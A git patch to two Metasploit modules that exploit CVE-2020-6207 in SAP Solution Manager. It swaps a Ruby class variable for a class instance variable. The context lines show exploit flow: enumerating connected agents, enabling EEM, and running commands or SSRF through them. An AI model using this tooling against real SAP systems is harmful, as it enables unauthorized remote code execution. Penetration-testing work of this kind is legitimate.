From 2a48dd265d8bb200ed6d2ead53700a52bbccee32 Mon Sep 17 00:00:00 2001 From: Vladimir Ivanov Date: Mon, 22 Mar 2021 12:13:04 +0300 Subject: [PATCH] Replace class var @@agents with a class instance var in auxiliary and exploit modules. --- .../admin/sap/cve_2020_6207_solman_rce.rb | 34 ++++++++++++------- .../multi/sap/cve_2020_6207_solman_rs.rb | 32 +++++++++++------ 2 files changed, 42 insertions(+), 24 deletions(-) diff --git a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb index 57fcae2942..776c905a59 100644 --- a/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb +++ b/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce.rb @@ -10,6 +10,8 @@ class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Metasploit::Framework::SapSolutionManager::Client + @agents = Array.new # Array of connected agents + def initialize(info = {}) super( update_info( @@ -57,7 +59,15 @@ class MetasploitModule < Msf::Auxiliary OptString.new('AGENT', [false, 'Agent server name for exec command or SSRF', 'agent_server_name']), ] ) - @@agents = Array.new # Array of connected agents + self.class.agents = Array.new + end + + class << self + attr_reader :agents + end + + class << self + attr_writer :agents end def setup_xml_and_variables @@ -123,12 +133,12 @@ class MetasploitModule < Msf::Auxiliary # Check current agent in agents list def check_agent(agent_name) - if @@agents.empty? + if self.class.agents.empty? fail_with(Failure::NoTarget, 'Available agents not found, please make agents list: `set action LIST; run`') elsif agent_name.nil? - fail_with(Failure::NoTarget, "Please set agent: `set AGENT #{@@agents[0]['serverName']}`") + fail_with(Failure::NoTarget, "Please set agent: `set AGENT #{self.class.agents[0]['serverName']}`") else - @@agents.each do |agent| + self.class.agents.each do |agent| if agent_name == agent[:serverName] return true end @@ -152,31 +162,31 @@ class MetasploitModule < Msf::Auxiliary def action_list # Clear agents array if that array is not empty - unless @@agents.empty? - @@agents.clear + unless self.class.agents.empty? + self.class.agents.clear end setup_xml_and_variables begin print_status("Getting a list of agents connected to the Solution Manager: #{@host}") - @@agents = make_agents_array(@path) + self.class.agents = make_agents_array(@path) rescue RuntimeError => e print_error("Failed to make the list of connected agents on the SAP Solution Manager page at #{@solman_uri}") vprint_error("Error #{e.class}: #{e}") analyze_error(e.message) end report_service_and_vuln - if @@agents.empty? + if self.class.agents.empty? print_good("Solution Manager server: #{@host}:#{@port} is vulnerable but no agents connected!") else - print_good("Connected agents list: \n#{pretty_agents_table(@@agents)}") + print_good("Connected agents list: \n#{pretty_agents_table(self.class.agents)}") end end def action_ssrf setup_xml_and_variables unless check_agent(@agent_name) - fail_with(Failure::NotFound, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(@@agents)}") + fail_with(Failure::NotFound, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(self.class.agents)}") end begin vprint_status("Enable EEM on agent: #{@agent_name}") @@ -190,7 +200,6 @@ class MetasploitModule < Msf::Auxiliary vprint_status("Delete script: #{@script_name} on agent: #{@agent_name}") delete_script_in_agent(@agent_name, @script_name, @path) - rescue RuntimeError => e print_error("Failed to send SSRF: '#{@ssrf_method} #{@ssrf_uri} HTTP/1.1' from agent: #{@agent_name}") vprint_error("Error #{e.class}: #{e}") @@ -203,7 +212,7 @@ class MetasploitModule < Msf::Auxiliary def action_exec setup_xml_and_variables unless check_agent(@agent_name) - fail_with(Failure::NotFound, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(@@agents)}") + fail_with(Failure::NotFound, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(self.class.agents)}") end begin vprint_status("Enable EEM on agent: #{@agent_name}") @@ -217,7 +226,6 @@ class MetasploitModule < Msf::Auxiliary vprint_status("Delete script: #{@script_name} on agent: #{@agent_name}") delete_script_in_agent(@agent_name, @script_name, @path) - rescue RuntimeError => e print_error("Failed to execution command: '#{@rce_command}' on agent: #{@agent_name}") vprint_error("Error #{e.class}: #{e}") diff --git a/modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb b/modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb index 9e62c271a4..1d3007294e 100644 --- a/modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb +++ b/modules/exploits/multi/sap/cve_2020_6207_solman_rs.rb @@ -11,6 +11,8 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Metasploit::Framework::SapSolutionManager::Client + @agents = Array.new # Array of connected agents + def initialize(info = {}) super( update_info( @@ -58,7 +60,15 @@ class MetasploitModule < Msf::Exploit::Remote OptString.new('AGENT', [true, 'Agent server name for exploitation', 'agent_server_name']), ] ) - @@agents = Array.new # Array of connected agents + self.class.agents = Array.new + end + + class << self + attr_reader :agents + end + + class << self + attr_writer :agents end def setup_variables @@ -119,11 +129,11 @@ class MetasploitModule < Msf::Exploit::Remote # Check current agent in agents list def check_agent(agent_name) - if @@agents.empty? + if self.class.agents.empty? begin print_status("Getting a list of agents connected to the Solution Manager: #{@host}") - @@agents = make_agents_array(@path) - vprint_good("Connected agents list: \n#{pretty_agents_table(@@agents)}") + self.class.agents = make_agents_array(@path) + vprint_good("Connected agents list: \n#{pretty_agents_table(self.class.agents)}") rescue RuntimeError => e print_error("Failed to make the list of connected agents on the SAP Solution Manager page at #{@solman_uri}") vprint_error("Error #{e.class}: #{e}") @@ -132,10 +142,10 @@ class MetasploitModule < Msf::Exploit::Remote end if agent_name.nil? - fail_with(Failure::NoTarget, "Please set agent: `set AGENT #{@@agents[0]['serverName']}`") + fail_with(Failure::NoTarget, "Please set agent: `set AGENT #{self.class.agents[0]['serverName']}`") end - @@agents.each do |agent| + self.class.agents.each do |agent| if agent_name == agent[:serverName] return true end @@ -160,7 +170,7 @@ class MetasploitModule < Msf::Exploit::Remote # Get agent OS by agent server name def get_agent_os(agent_name) - @@agents.each do |agent| + self.class.agents.each do |agent| if agent_name == agent[:serverName] return agent[:osName] end @@ -171,14 +181,14 @@ class MetasploitModule < Msf::Exploit::Remote def check setup_variables begin - @@agents = make_agents_array(@path) + self.class.agents = make_agents_array(@path) rescue RuntimeError return Exploit::CheckCode::Safe end - if @@agents.empty? + if self.class.agents.empty? print_status("Solution Manager server: #{@host}:#{@port} is vulnerable but no agents connected!") else - print_good("Connected agents list: \n#{pretty_agents_table(@@agents)}") + print_good("Connected agents list: \n#{pretty_agents_table(self.class.agents)}") end report_service_and_vuln Exploit::CheckCode::Vulnerable @@ -187,7 +197,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit setup_variables unless check_agent(@agent_name) - fail_with(Failure::BadConfig, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(@@agents)}") + fail_with(Failure::BadConfig, "Not found agent: #{@agent_name} in connected agents: \n#{pretty_agents_table(self.class.agents)}") end report_service_and_vuln agent_os = get_agent_os(@agent_name) || 'Unknown OS'